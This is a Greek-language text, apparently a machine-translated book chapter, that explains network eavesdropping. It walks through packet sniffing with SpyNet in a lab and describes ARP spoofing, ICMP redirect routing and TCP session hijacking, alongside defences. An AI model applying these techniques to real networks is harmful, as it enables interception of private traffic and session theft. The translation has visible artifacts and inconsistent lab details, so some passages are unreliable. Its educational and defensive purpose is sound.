Υπάρχουν διεθνή πρότυπα για την παρακολούθηση δεδομένων. Το Ευρωπαϊκό Ινστιτούτο Τηλεπικοινωνιακών Προτύπων κατάφερε να φέρει σε ένα ενιαίο πρότυπο μια σειρά τεχνικών διαδικασιών (ETSI ES 201 158 "Telecommunications security; Lawful Interception (LI); Requirements for network functions"), στις οποίες βασίζεται η υποκλοπή πληροφοριών. Ως αποτέλεσμα, αναπτύχθηκε μια αρχιτεκτονική συστήματος που βοηθά τους ειδικούς των μυστικών υπηρεσιών, τους διαχειριστές δικτύων να αναλαμβάνουν νόμιμα δεδομένα από το δίκτυο. Η ανεπτυγμένη δομή για την υλοποίηση της υποκλοπής δεδομένων μέσω του δικτύου χρησιμοποιείται για ενσύρματα και ασύρματα συστήματαφωνητικές κλήσεις, καθώς και αλληλογραφία μέσω ταχυδρομείου, φωνητικά μηνύματα μέσω IP, ανταλλαγή πληροφοριών μέσω SMS.

Η μη εξουσιοδοτημένη υποκλοπή δεδομένων μέσω του δικτύου πραγματοποιείται από εισβολείς που θέλουν να αποκτήσουν στην κατοχή τους εμπιστευτικά δεδομένα, κωδικούς πρόσβασης, εταιρικά μυστικά, διευθύνσεις μηχανών υπολογιστών στο δίκτυο κ.λπ. Για να επιτύχουν τους στόχους τους, οι χάκερ χρησιμοποιούν συνήθως έναν αναλυτή κίνησης δικτύου - έναν ανιχνευτή. Αυτό το πρόγραμμαή μια συσκευή τύπου υλικού-λογισμικού δίνει στον απατεώνα τη δυνατότητα να υποκλέψει και να αναλύσει πληροφορίες εντός του δικτύου στο οποίο είναι συνδεδεμένος ο χρήστης-θύμα, συμπεριλαμβανομένης της κρυπτογραφημένης κίνησης SSL μέσω της αντικατάστασης πιστοποιητικών. Τα δεδομένα κίνησης μπορούν να συλληφθούν με διάφορους τρόπους:

ακρόαση στη διεπαφή δικτύου,
σύνδεση ενός διακόπτη σε μια διακοπή καναλιού,
δημιουργία ενός κλάδου κυκλοφορίας και αντιγραφή του σε ένα sniffer,
διενεργώντας επίθεση.

Υπάρχουν επίσης πιο εξελιγμένες τεχνολογίες για την υποκλοπή ευαίσθητων πληροφοριών που επιτρέπουν την εισβολή στην αλληλεπίδραση δικτύου και την αλλαγή δεδομένων. Μια τέτοια τεχνική είναι τα ψευδή αιτήματα ARP. Η ουσία της μεθόδου είναι η πλαστογράφηση διευθύνσεων IP μεταξύ του υπολογιστή του θύματος και της συσκευής του εισβολέα. Μια άλλη μέθοδος που μπορεί να χρησιμοποιηθεί για την υποκλοπή δεδομένων μέσω του δικτύου είναι η δρομολόγηση δόλωμα. Συνίσταται στην αντικατάσταση της διεύθυνσης IP του δρομολογητή δικτύου με τη δική του διεύθυνση. Εάν ένας εγκληματίας του κυβερνοχώρου γνωρίζει πώς είναι οργανωμένο το τοπικό δίκτυο στο οποίο βρίσκεται το θύμα, τότε μπορεί εύκολα να οργανώσει τη λήψη πληροφοριών από το μηχάνημα του χρήστη στη διεύθυνση IP του. Η λήψη μιας σύνδεσης TCP εξυπηρετεί επίσης με αποτελεσματικό τρόπουποκλοπή δεδομένων. Ένας εισβολέας διακόπτει μια συνεδρία επικοινωνίας δημιουργώντας και στέλνοντας πακέτα TCP στον υπολογιστή του θύματος. Περαιτέρω, η συνεδρία επικοινωνίας αποκαθίσταται, παρεμποδίζεται και συνεχίζεται από τον εγκληματία αντί από τον πελάτη.

Αντικείμενο επιρροής

Τα αντικείμενα υποκλοπής δεδομένων μέσω του δικτύου μπορεί να είναι κυβερνητικές υπηρεσίες, βιομηχανικές επιχειρήσεις, εμπορικές δομές, απλοί χρήστες. Μέσα σε έναν οργανισμό ή μια επιχείρηση, η συλλογή πληροφοριών μπορεί να εφαρμοστεί για την προστασία της υποδομής του δικτύου. Οι ειδικές υπηρεσίες και οι υπηρεσίες επιβολής του νόμου μπορούν να πραγματοποιούν μαζικές υποκλοπές πληροφοριών που μεταδίδονται από διαφορετικούς κατόχους, ανάλογα με την εργασία.

Αν μιλάμε για εγκληματίες του κυβερνοχώρου, τότε οποιοσδήποτε χρήστης ή οργανισμός μπορεί να γίνει αντικείμενο επιρροής προκειμένου να αποκτήσει δεδομένα που μεταδίδονται μέσω του δικτύου. Με την εξουσιοδοτημένη πρόσβαση, το ενημερωτικό μέρος των πληροφοριών που λαμβάνονται είναι σημαντικό, ενώ ο εισβολέας ενδιαφέρεται περισσότερο για τα δεδομένα με τα οποία θα έχει στην κατοχή του μετρητάή πολύτιμες πληροφορίες για την επακόλουθη πώλησή του.

Τις περισσότερες φορές, τα θύματα της υποκλοπής πληροφοριών από εγκληματίες του κυβερνοχώρου είναι χρήστες που συνδέονται σε ένα δημόσιο δίκτυο, για παράδειγμα, σε ένα καφέ με μια κουκκίδα Πρόσβαση WiFi. Ένας εισβολέας συνδέεται σε μια περίοδο σύνδεσης ιστού χρησιμοποιώντας ένα sniffer, αντικαθιστά δεδομένα και κλέβει προσωπικές πληροφορίες. Περισσότερες λεπτομέρειες για το πώς συμβαίνει αυτό περιγράφονται στο άρθρο.

Πηγή απειλής

Η εξουσιοδοτημένη υποκλοπή πληροφοριών σε εταιρείες και οργανισμούς πραγματοποιείται από φορείς εκμετάλλευσης υποδομών δημοσίων δικτύων. Οι δραστηριότητές τους στοχεύουν στην προστασία προσωπικών δεδομένων, εμπορικών μυστικών και άλλων σημαντικές πληροφορίες. Για νομικούς λόγους, η μεταφορά μηνυμάτων και αρχείων μπορεί να παρακολουθείται από ειδικές υπηρεσίες, υπηρεσίες επιβολής του νόμου και διάφορες κρατικές υπηρεσίες για τη διασφάλιση της ασφάλειας των πολιτών και του κράτους.

Οι επιτιθέμενοι εμπλέκονται σε παράνομη υποκλοπή δεδομένων. Για να μην πέσετε θύμα κυβερνοεγκληματίας, πρέπει να ακολουθήσετε ορισμένες συστάσεις από ειδικούς. Για παράδειγμα, δεν πρέπει να εκτελείτε λειτουργίες που απαιτούν εξουσιοδότηση και μεταφορά ευαίσθητων δεδομένων σε μέρη όπου η σύνδεση γίνεται με δημόσια δίκτυα. Είναι ασφαλέστερο να επιλέγετε κρυπτογραφημένα δίκτυα και ακόμα καλύτερα να χρησιμοποιείτε προσωπικά μόντεμ 3G και LTE. Κατά τη μεταφορά προσωπικών δεδομένων, συνιστάται η κρυπτογράφηση τους χρησιμοποιώντας το πρωτόκολλο HTTPS ή μια προσωπική σήραγγα VPN.

Μπορείτε να προστατεύσετε τον υπολογιστή σας από την υποκλοπή της κυκλοφορίας δικτύου χρησιμοποιώντας κρυπτογραφία, anti-sniffers. Η πρόσβαση μέσω τηλεφώνου και όχι ασύρματου δικτύου θα μειώσει τους κινδύνους.

Αυτό το μάθημα περιγράφει τεχνολογίες παραβίασης δικτύου που βασίζονται στην υποκλοπή πακέτων δικτύου. Οι χάκερ χρησιμοποιούν τέτοιες τεχνολογίες για να ανιχνεύσουν την κυκλοφορία του δικτύου για να κλέψουν πολύτιμες πληροφορίες, να υποκλέψουν δεδομένα με σκοπό μια επίθεση man-in-the-middle, να υποκλέψουν συνδέσεις TCP, επιτρέποντας, ας πούμε, την πλαστογράφηση δεδομένων και την εκτέλεση άλλων εξίσου ενδιαφέρουσες ενέργειες . Δυστυχώς, οι περισσότερες από αυτές τις επιθέσεις στην πράξη υλοποιούνται μόνο για δίκτυα Unix, για τα οποία οι χάκερ μπορούν να χρησιμοποιήσουν και τα δύο ειδικές βοηθητικές υπηρεσίες, και εργαλεία συστήματος Unix. Τα δίκτυα των Windows φαίνεται να παρακάμπτονται από τους χάκερ και είμαστε αναγκασμένοι να περιορίσουμε την περιγραφή των εργαλείων υποκλοπής δεδομένων σε προγράμματα ανίχνευσης που έχουν σχεδιαστεί για ασήμαντο sniffing πακέτων δικτύου. Ωστόσο, δεν πρέπει να παραμεληθεί κανείς τουλάχιστον μια θεωρητική περιγραφή τέτοιων επιθέσεων, ειδικά για τους αντι-χάκερ, καθώς η γνώση των τεχνολογιών hacking που χρησιμοποιούνται θα βοηθήσει στην αποφυγή πολλών προβλημάτων.

Δίκτυο sniffing

Για sniffing χρησιμοποιούνται συνήθως δίκτυα Ethernet κάρτες δικτύουτεθεί σε λειτουργία ακρόασης. Ακούγοντας Δίκτυα Ethernetαπαιτεί τη σύνδεση ενός υπολογιστή που εκτελεί ένα πρόγραμμα sniffer σε ένα τμήμα δικτύου, μετά το οποίο ο χάκερ έχει πρόσβαση σε όλη την κίνηση δικτύου που αποστέλλεται και λαμβάνεται από υπολογιστές σε αυτό το τμήμα δικτύου. Είναι ακόμη πιο εύκολο να παρακολουθείτε την κυκλοφορία ραδιοφωνικών δικτύων χρησιμοποιώντας ενδιάμεσους ασύρματου δικτύου - σε αυτήν την περίπτωση, δεν χρειάζεται καν να αναζητήσετε ένα μέρος για να συνδεθείτε στο καλώδιο. Ή ένας εισβολέας μπορεί να συνδεθεί στην τηλεφωνική γραμμή που συνδέει τον υπολογιστή με τον διακομιστή Διαδικτύου, βρίσκοντας ένα βολικό μέρος για αυτό (οι τηλεφωνικές γραμμές συνήθως τοποθετούνται σε υπόγεια και άλλα μη προστατευμένα μέρη).

Για να επιδείξουμε την τεχνολογία sniffing, θα χρησιμοποιήσουμε το πολύ δημοφιλές πρόγραμμα sniffer SpyNet, το οποίο βρίσκεται σε πολλές τοποθεσίες Web. Ο επίσημος ιστότοπος του προγράμματος SpyNet βρίσκεται στη διεύθυνση http://members.xoom.com/layrentiu2/ , όπου μπορείτε να κατεβάσετε μια δοκιμαστική έκδοση του προγράμματος.

Το πρόγραμμα SpyNet αποτελείται από δύο στοιχεία - το CaptureNet και το PipeNet. Το πρόγραμμα CaptureNet σάς επιτρέπει να καταγράφετε πακέτα που μεταδίδονται μέσω δικτύου Ethernet σε επίπεδο δικτύου, π.χ. ως πλαίσια Ethernet. Το πρόγραμμα PipeNet σάς επιτρέπει να συλλέγετε πλαίσια Ethernet σε πακέτα επιπέδου εφαρμογών, ανακτώντας, για παράδειγμα, μηνύματα ΗΛΕΚΤΡΟΝΙΚΗ ΔΙΕΥΘΥΝΣΗ, μηνύματα πρωτοκόλλου HTTP (ανταλλαγή πληροφοριών με διακομιστή Web) και εκτέλεση άλλων λειτουργιών.

Δυστυχώς, στην επίδειξη του SpyNet, οι δυνατότητες του PipeNet περιορίζονται στην επίδειξη δημιουργίας πακέτου HTTP, επομένως δεν θα μπορούμε να επιδείξουμε το SpyNet στο σύνολό του. Ωστόσο, θα δείξουμε τις δυνατότητες του sniffing δικτύου SpyNet χρησιμοποιώντας το πειραματικό μας δίκτυο ως παράδειγμα, περνώντας αρχείο κειμένουαπό τον κεντρικό υπολογιστή Sword-2000 στον κεντρικό υπολογιστή Alex-3 χρησιμοποιώντας το συνηθισμένο Εξερεύνηση των Windows. Ταυτόχρονα, στον υπολογιστή A1ex-1, θα τρέξουμε το πρόγραμμα CaptureNet, το οποίο θα παρεμποδίσει τα μεταδιδόμενα πακέτα και θα μας επιτρέψει να διαβάσουμε τα περιεχόμενα του μεταφερόμενου αρχείου σε πλαίσια Ethernet. Στο Σχ. 1 δείχνει το κείμενο του μυστικού μηνύματος στο αρχείο secret.txt ; θα προσπαθήσουμε να βρούμε αυτό το κείμενο στα υποκλαπέντα πλαίσια Ethernet.

Ρύζι. 1. Το κείμενο του μυστικού μηνύματος στο παράθυρο Σημειωματάριο

Ακολουθήστε αυτά τα βήματα για να καταγράψετε πλαίσια Ethernet.

Στον υπολογιστή Alex-3, ξεκινήστε το πρόγραμμα CaptureNet. Στο εμφανιζόμενο παράθυρο εργασίας του προγράμματος, επιλέξτε την εντολή μενού Capture * Start (Capture * Start) και ξεκινήστε τη διαδικασία υποκλοπής πλαισίων δικτύου.

Χρησιμοποιώντας την Εξερεύνηση των Windows, αντιγράψτε το αρχείο security.txt από τον υπολογιστή Sword-2000 στο A1ex-3.

Αφού μεταφέρετε το αρχείο secret.txt, επιλέξτε την εντολή μενού Capture * Stop και σταματήστε τη διαδικασία λήψης.

Τα καταγεγραμμένα πλαίσια Ethernet θα εμφανίζονται στη δεξιά πλευρά του παραθύρου εργασίας CaptureNet (Εικόνα 2), με κάθε γραμμή στην επάνω λίστα να αντιπροσωπεύει ένα πλαίσιο Ethernet και κάτω από τη λίστα θα εμφανίζεται το περιεχόμενο του επιλεγμένου πλαισίου.

Ρύζι. 2. Το πλαίσιο Ethernet περιέχει το κείμενο του μυστικού μηνύματος

Κοιτάζοντας τη λίστα των υποκλαπόμενων καρέ, μπορούμε εύκολα να βρούμε αυτό που περιέχει το κείμενο που μεταδώσαμε Αυτό είναι ένα πολύ μεγάλο μυστικό (Αυτό είναι ένα πολύ μεγάλο μυστικό).

Τονίζουμε ότι αυτό είναι το απλούστερο παράδειγμα, όταν καταγράφηκε όλη η υποκλαπόμενη κίνηση δικτύου. Το πρόγραμμα CaptureNet σάς επιτρέπει να συλλαμβάνετε πακέτα που αποστέλλονται μέσω συγκεκριμένων πρωτοκόλλων και σε συγκεκριμένες θύρες κεντρικού υπολογιστή, να επιλέγετε μηνύματα με συγκεκριμένο περιεχόμενο και να συγκεντρώνετε τα δεδομένα που έχουν καταγραφεί σε ένα αρχείο. Η τεχνική για την εκτέλεση τέτοιων ενεργειών είναι απλή και μπορείτε να την μάθετε από το σύστημα βοήθειας του προγράμματος SpyNet.

Εκτός από την πρωτόγονη ακρόαση στο δίκτυο, διατίθενται στους χάκερ πιο εξελιγμένα μέσα υποκλοπής δεδομένων. Παρακάτω είναι μια σύντομη επισκόπηση τέτοιων μεθόδων, ωστόσο, από μια θεωρητική πτυχή. Ο λόγος είναι ότι για τα δίκτυα των Windows, η πρακτική εφαρμογή των επιθέσεων υποκλοπής δεδομένων είναι εξαιρετικά περιορισμένη και το σύνολο αξιόπιστων εργαλείων για επιθέσεις υποκλοπής είναι μάλλον φτωχό.

Μέθοδοι υποκλοπής κίνησης δικτύου

Η ακρόαση του δικτύου με προγράμματα ανίχνευσης δικτύου όπως το CaptureNet παραπάνω είναι ο πρώτος, ευκολότερος τρόπος για να υποκλέψετε δεδομένα. Εκτός από το SpyNet, το sniffing δικτύου χρησιμοποιεί πολλά εργαλεία που αναπτύχθηκαν αρχικά με σκοπό την ανάλυση της δραστηριότητας του δικτύου, τη διάγνωση δικτύων, την επιλογή της κυκλοφορίας σύμφωνα με καθορισμένα κριτήρια και άλλες εργασίες διαχείρισης δικτύου. Ένα παράδειγμα τέτοιου προγράμματος είναι το tcpdump (http://www.tcpdump.org ), το οποίο σας επιτρέπει να γράψετε την κυκλοφορία δικτύου σε ένα ειδικό αρχείο καταγραφής για μεταγενέστερη ανάλυση.

Για την προστασία από την υποκλοπή δικτύου, χρησιμοποιούνται ειδικά προγράμματα, για παράδειγμα, το AntiSniff (http://www.securitysoftwaretech.com/antisniff ), τα οποία είναι σε θέση να ανιχνεύουν υπολογιστές στο δίκτυο που ακούν την κυκλοφορία δικτύου. Για να λύσουν τα προβλήματά τους, τα προγράμματα anti-sniffer χρησιμοποιούν μια ειδική ένδειξη της παρουσίας συσκευών ακρόασης στο δίκτυο - η κάρτα δικτύου του υπολογιστή sniffer πρέπει να βρίσκεται σε ειδική λειτουργία ακρόασης. Όταν βρίσκονται σε λειτουργία ακρόασης, οι δικτυωμένοι υπολογιστές ανταποκρίνονται με ειδικό τρόπο σε datagrams IP που αποστέλλονται στον υπό δοκιμή κεντρικό υπολογιστή. Για παράδειγμα, οι κεντρικοί υπολογιστές ακρόασης επεξεργάζονται συνήθως όλη την εισερχόμενη κίνηση, όχι μόνο τα γραφήματα δεδομένων που αποστέλλονται στη διεύθυνση κεντρικού υπολογιστή. Υπάρχουν άλλα σημάδια ύποπτης συμπεριφοράς κεντρικού υπολογιστή που μπορεί να αναγνωρίσει το AntiSniff.

Ψεύτικα αιτήματα ARP

Προκειμένου να υποκλαπεί και να κυκλοφόρησε τη διαδικασία επικοινωνίας δικτύου μεταξύ δύο κεντρικών υπολογιστών Α και Β, ένας εισβολέας μπορεί να αντικαταστήσει τις διευθύνσεις IP των κεντρικών υπολογιστών που αλληλεπιδρούν με τη δική τους διεύθυνση IP στέλνοντας ψεύτικα μηνύματα ARP (Πρωτόκολλο Ανάλυσης Διεύθυνσης) στους κεντρικούς υπολογιστές Α και Β. . Το πρωτόκολλο ARP βρίσκεται στο Παράρτημα Δ, το οποίο περιγράφει τον τρόπο επίλυσης (μετάφρασης) της διεύθυνσης IP ενός κεντρικού υπολογιστή σε μια διεύθυνση μηχανής (διεύθυνση MAC) ενσωματωμένη στο NIC του κεντρικού υπολογιστή. Ας δούμε πώς ένας χάκερ μπορεί να χρησιμοποιήσει το πρωτόκολλο ARP για να υποκλέψει την επικοινωνία δικτύου μεταξύ των κεντρικών υπολογιστών Α και Β.

Ένας εισβολέας καθορίζει τις διευθύνσεις MAC των κεντρικών υπολογιστών Α και Β, για παράδειγμα, χρησιμοποιώντας την εντολή nbtstat από το πακέτο W2RK.

Ο εισβολέας στέλνει μηνύματα στις αναγνωρισμένες διευθύνσεις MAC των κεντρικών υπολογιστών Α και Β, τα οποία είναι παραποιημένες απαντήσεις ARP σε αιτήματα επίλυσης των διευθύνσεων IP των κεντρικών υπολογιστών στις διευθύνσεις MAC των υπολογιστών. Ενημερώνεται στον κεντρικό υπολογιστή Α ότι η διεύθυνση IP του κεντρικού υπολογιστή Β ταιριάζει με τη διεύθυνση MAC του υπολογιστή του εισβολέα. Ο κεντρικός υπολογιστής Β ενημερώνεται ότι η διεύθυνση IP του κεντρικού υπολογιστή Α ταιριάζει επίσης με τη διεύθυνση MAC του υπολογιστή του εισβολέα.

Οι κεντρικοί υπολογιστές Α και Β εισάγουν τις ληφθείσες διευθύνσεις MAC στις κρυφές μνήμες ARP και στη συνέχεια τις χρησιμοποιούν για να στείλουν μηνύματα ο ένας στον άλλο. Δεδομένου ότι οι διευθύνσεις IP Α και Β αντιστοιχούν στη διεύθυνση MAC του υπολογιστή του εισβολέα, οι κεντρικοί υπολογιστές Α και Β, χωρίς να γνωρίζουν τίποτα, επικοινωνούν μέσω ενός ενδιάμεσου ικανού να κάνει ό,τι θέλουν με τα μηνύματά τους.

Για την προστασία από τέτοιες επιθέσεις, οι διαχειριστές δικτύου πρέπει να διατηρούν μια βάση δεδομένων με έναν πίνακα αντιστοίχισης μεταξύ των διευθύνσεων MAC και των διευθύνσεων IP των υπολογιστών δικτύου τους. Στη συνέχεια, χρησιμοποιώντας ένα ειδικό λογισμικό, για παράδειγμα, το βοηθητικό πρόγραμμα arpwatch (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz ) μπορεί να σαρώνει περιοδικά το δίκτυο για ασυνέπειες.

Σε δίκτυα UNIX, αυτό το είδος πλαστογράφησης επίθεσης ARP μπορεί να υλοποιηθεί χρησιμοποιώντας τα βοηθητικά προγράμματα παρακολούθησης και ελέγχου της κυκλοφορίας δικτύου του συστήματος, όπως το arpredirect . Δυστυχώς, τα δίκτυα Windows 2000/XP δεν φαίνεται να εφαρμόζουν τόσο αξιόπιστα βοηθητικά προγράμματα. Για παράδειγμα, στον ιστότοπο του NTsecurity (http://www.ntsecurity.nu) μπορείτε να κάνετε λήψη του βοηθητικού προγράμματος GrabitAII, το οποίο παρουσιάζεται ως εργαλείο για την ανακατεύθυνση της κυκλοφορίας μεταξύ των κεντρικών υπολογιστών δικτύου. Ωστόσο, ένας στοιχειώδης έλεγχος απόδοσης του βοηθητικού προγράμματος GrabitAII δείχνει ότι απέχει ακόμα πολύ από την πλήρη επιτυχία στην υλοποίηση των λειτουργιών του.

Εσφαλμένη δρομολόγηση

Για να εκτελέσει δρομολόγηση δόλωμα, ο εισβολέας πρέπει να γνωρίζει ορισμένες λεπτομέρειες σχετικά με την οργάνωση του τοπικού δικτύου στο οποίο βρίσκεται ο κεντρικός υπολογιστής Α, ιδίως τη διεύθυνση IP του δρομολογητή μέσω του οποίου αποστέλλεται η κίνηση από τον κεντρικό υπολογιστή Α στο Β. Γνωρίζοντας αυτό, ο εισβολέας θα σχηματίσει ένα datagram IP στο οποίο IP - Η διεύθυνση προέλευσης καθορίζεται ως η διεύθυνση IP του δρομολογητή και ο προορισμός είναι ο κεντρικός υπολογιστής A. Επίσης στο datagram περιλαμβάνεται ένα μήνυμα ICMP Redirect με το πεδίο διεύθυνσης του νέου δρομολογητή ορισμένο στη διεύθυνση IP του υπολογιστή του εισβολέα. Έχοντας λάβει ένα τέτοιο μήνυμα, ο κεντρικός υπολογιστής Α θα στείλει όλα τα μηνύματα στη διεύθυνση IP του υπολογιστή του εισβολέα.

Η πρακτική εφαρμογή όλων των κρυπτογραφικών μεθόδων προστασίας της ανταλλαγής πληροφοριών που περιγράφονται στο Κεφάλαιο 4 παρέχεται από τα VPN (Virtual Private Networks - Virtual Private Networks). Μια σύντομη επισκόπηση των αρχών και των μεθόδων κρυπτογραφικής προστασίας βρίσκεται στο Παράρτημα Ε και Λεπτομερής περιγραφήκρυπτογραφική προστασία που παρέχεται από την PGP Desktop Security (http://www.pgp.com ).

Υποκλοπή σύνδεσης TCP

Πολλά αποτελεσματικά βοηθητικά προγράμματα έχουν δημιουργηθεί για την εκτέλεση επιθέσεων πειρατείας TCP, αλλά όλα υλοποιούνται για την πλατφόρμα Unix και αυτά τα βοηθητικά προγράμματα είναι διαθέσιμα σε τοποθεσίες Web μόνο σε μορφή πηγαίου κώδικα. Έτσι, εμείς, ως πεπεισμένοι επαγγελματίες στην ευγενή αιτία του hacking, έχουμε ελάχιστη χρήση για επιθέσεις παρεμποδίζοντας μια σύνδεση TCP. (Οι ερασιτέχνες για να κατανοήσουν τον κώδικα προγράμματος κάποιου άλλου μπορούν να ανατρέξουν στον ιστότοπο http://www.cri.cz/~kra/index.html , όπου μπορείτε να κάνετε λήψη πηγήγνωστό βοηθητικό πρόγραμμα υποκλοπής σύνδεσης TCP Hunt από τον Pavel Krauz).

Παρά την έλλειψη πρακτικών εργαλείων, δεν μπορούμε να αγνοήσουμε ένα τόσο ενδιαφέρον θέμα όπως η υποκλοπή συνδέσεων TCP και να σταθούμε σε ορισμένες πτυχές τέτοιων επιθέσεων. Μερικές πληροφορίες σχετικά με τη δομή ενός πακέτου TCP και πώς δημιουργούνται οι συνδέσεις TCP δίνονται στο Παράρτημα Δ αυτού του βιβλίου, αλλά εδώ θα επικεντρωθούμε στο ερώτημα - τι ακριβώς επιτρέπει στους χάκερ να εκτελούν επιθέσεις υποκλοπής σύνδεσης TCP; Ας εξετάσουμε αυτό το θέμα με περισσότερες λεπτομέρειες, βασιζόμενοι κυρίως στη συζήτηση στο και.

Το TCP (Transmission Control Protocol) είναι ένα από τα βασικά πρωτόκολλα επιπέδου μεταφοράς OSI που σας επιτρέπει να δημιουργείτε λογικές συνδέσεις μέσω ενός εικονικού καναλιού επικοινωνίας. Τα πακέτα μεταδίδονται και λαμβάνονται μέσω αυτού του καναλιού με καταχώρηση της ακολουθίας τους, ελέγχεται η ροή των πακέτων, οργανώνεται η αναμετάδοση παραμορφωμένων πακέτων και στο τέλος της συνεδρίας διακόπτεται το κανάλι επικοινωνίας. Το πρωτόκολλο TCP είναι το μόνο βασικό πρωτόκολλο στην οικογένεια TCP/IP που διαθέτει προηγμένο σύστημα αναγνώρισης μηνυμάτων και σύνδεσης.

Για την αναγνώριση ενός πακέτου TCP, υπάρχουν δύο αναγνωριστικά 32-bit στην κεφαλίδα TCP, τα οποία παίζουν επίσης το ρόλο ενός μετρητή πακέτων, που ονομάζεται αριθμός ακολουθίας και αριθμός επιβεβαίωσης. Θα μας ενδιαφέρει επίσης ένα άλλο πεδίο του πακέτου TCP, που ονομάζεται bit ελέγχου. Αυτό το πεδίο 6-bit περιλαμβάνει τα ακόλουθα bit ελέγχου (με σειρά από αριστερά προς τα δεξιά):

URG - επείγουσα σημαία.

ACK - σημαία επιβεβαίωσης.

PSH - σημαία μεταφοράς.

RST - σημαία επαναφοράς σύνδεσης.

SYN - σημαία συγχρονισμού.

FIN - σημαία τερματισμού σύνδεσης.

Εξετάστε τη διαδικασία για τη δημιουργία μιας σύνδεσης TCP.

1. Εάν ο κεντρικός υπολογιστής Α χρειάζεται να δημιουργήσει μια σύνδεση TCP με τον κεντρικό υπολογιστή Β, τότε ο κεντρικός υπολογιστής Α στέλνει το ακόλουθο μήνυμα στον κεντρικό υπολογιστή Β:

Α -> Β: ΣΥΝ, ΙΣΣα

Αυτό σημαίνει ότι το μήνυμα που αποστέλλεται από τον κεντρικό υπολογιστή Α έχει τη σημαία SYN (Συγχρονισμός αριθμού ακολουθίας) και το πεδίο αριθμού ακολουθίας έχει οριστεί στο αρχικό ISSa 32-bit (Αρχικός Αριθμός Ακολουθίας).

2. Σε απόκριση σε ένα αίτημα που ελήφθη από τον κεντρικό υπολογιστή Α, ο κεντρικός υπολογιστής Β απαντά με ένα μήνυμα με το σύνολο bit SYN και το σύνολο bit ACK. Στο πεδίο αριθμού ακολουθίας, ο κεντρικός υπολογιστής Β ορίζει την αρχική του τιμή μετρητή, ISSb. το πεδίο αριθμού επιβεβαίωσης θα περιέχει τότε την τιμή ISSa που ελήφθη στο πρώτο πακέτο από τον κεντρικό υπολογιστή Α συν ένα. Έτσι ο οικοδεσπότης Β απαντά με αυτό το μήνυμα:

B -> A: SYN, ACK, ISSb, ACK(ISSa+1)

3. Τέλος, ο κεντρικός υπολογιστής Α στέλνει ένα μήνυμα στον κεντρικό υπολογιστή Β στο οποίο: έχει οριστεί το bit ACK. το πεδίο σειριακού αριθμού περιέχει την τιμή ISSa + 1 ; το πεδίο αριθμού επιβεβαίωσης περιέχει την τιμή ISSb + 1 . Μετά από αυτό, η σύνδεση TCP μεταξύ των κεντρικών υπολογιστών Α και Β θεωρείται εδραιωμένη:

A -> B: ACK, ISSa+1, ACK(ISSb+1)

4. Ο κεντρικός υπολογιστής Α μπορεί τώρα να στείλει πακέτα δεδομένων στον κεντρικό υπολογιστή Β μέσω του νεοδημιουργημένου εικονικού καναλιού TCP:

A -> B: ACK, ISSa+1, ACK(ISSb+1); ΔΕΔΟΜΕΝΑ

Εδώ DATA σημαίνει δεδομένα.

Από τον αλγόριθμο για τη δημιουργία μιας σύνδεσης TCP που συζητήθηκε παραπάνω, μπορεί να φανεί ότι τα μόνα αναγνωριστικά των συνδρομητών TCP και μιας σύνδεσης TCP είναι δύο παράμετροι αριθμού ακολουθίας 32-bit και αριθμού επιβεβαίωσης - ISSa και ISSb . Επομένως, εάν ένας χάκερ καταφέρει να ανακαλύψει τις τρέχουσες τιμές των πεδίων ISSa και ISSb, τότε τίποτα δεν θα τον εμποδίσει να δημιουργήσει ένα παραποιημένο πακέτο TCP. Αυτό σημαίνει ότι αρκεί ένας χάκερ να πάρει τις τρέχουσες τιμές των παραμέτρων ISSa και ISSb ενός πακέτου TCP για μια δεδομένη σύνδεση TCP, να στείλει ένα πακέτο από οποιονδήποτε κεντρικό υπολογιστή Διαδικτύου για λογαριασμό πελάτη αυτής της σύνδεσης TCP, και αυτό το πακέτο θα γίνει δεκτό ως έγκυρο!

Ο κίνδυνος πλαστογράφησης πακέτων TCP είναι επίσης σημαντικός επειδή τα πρωτόκολλα FTP και TELNET υψηλού επιπέδου υλοποιούνται με βάση το πρωτόκολλο TCP και η αναγνώριση των πελατών FTP και των πακέτων TELNET βασίζεται εξ ολοκλήρου στο πρωτόκολλο TCP.

Επίσης, δεδομένου ότι τα πρωτόκολλα FTP και TELNET δεν ελέγχουν τις διευθύνσεις IP των αποστολέων μηνυμάτων, όταν λάβουν ένα πλαστογραφημένο πακέτο, οι διακομιστές FTP ή TELNET θα στείλουν ένα μήνυμα απάντησης στη διεύθυνση IP του κεντρικού υπολογιστή χάκερ που καθορίζεται στο πλαστογραφημένο πακέτο. Μετά από αυτό, ο κεντρικός υπολογιστής χάκερ θα αρχίσει να εργάζεται με τον διακομιστή FTP ή TELNET από τη διεύθυνση IP του, αλλά με τα δικαιώματα ενός νόμιμα συνδεδεμένου χρήστη, ο οποίος, με τη σειρά του, θα χάσει τη σύνδεση με τον διακομιστή λόγω αναντιστοιχίας μετρητή.

Έτσι, για να πραγματοποιηθεί η επίθεση που περιγράφηκε παραπάνω, απαραίτητη και επαρκής προϋπόθεση είναι η γνώση των δύο τρεχουσών παραμέτρων 32-bit ISSa και ISSb , που προσδιορίζουν μια σύνδεση TCP. Σκεφτείτε πιθανούς τρόπουςτην παραλαβή τους. Στην περίπτωση που ένας κεντρικός υπολογιστής χάκερ είναι συνδεδεμένος με το τμήμα δικτύου που δέχεται επίθεση, το έργο της απόκτησης τιμών ISSa και ISSb είναι ασήμαντο και επιλύεται με την ανάλυση της κυκλοφορίας του δικτύου. Επομένως, πρέπει να γίνει σαφώς κατανοητό ότι το πρωτόκολλο TCP επιτρέπει, καταρχήν, την προστασία της σύνδεσης μόνο εάν είναι αδύνατο για τον εισβολέα να υποκλέψει μηνύματα που μεταδίδονται μέσω αυτή η σύνδεση, δηλαδή, μόνο εάν ο κεντρικός υπολογιστής χάκερ είναι συνδεδεμένος σε τμήμα δικτύου διαφορετικό από το τμήμα συνδρομητή της σύνδεσης TCP.

Επομένως, οι επιθέσεις μεταξύ τμημάτων παρουσιάζουν το μεγαλύτερο ενδιαφέρον για έναν χάκερ, όταν ο εισβολέας και ο στόχος του βρίσκονται σε διαφορετικά τμήματα δικτύου. Σε αυτήν την περίπτωση, το έργο της απόκτησης των τιμών των ISSa και ISSb δεν είναι ασήμαντο. Για την επίλυση αυτού του προβλήματος, μέχρι στιγμής έχουν εφευρεθεί μόνο δύο μέθοδοι.

Μαθηματική πρόβλεψη της αρχικής τιμής των παραμέτρων σύνδεσης TCP με παρέκταση των προηγούμενων τιμών των ISSa και ISSb.

Εκμετάλλευση τρωτών σημείων στην αναγνώριση συνδρομητών σύνδεσης TCP σε διακομιστές Unix rsh.

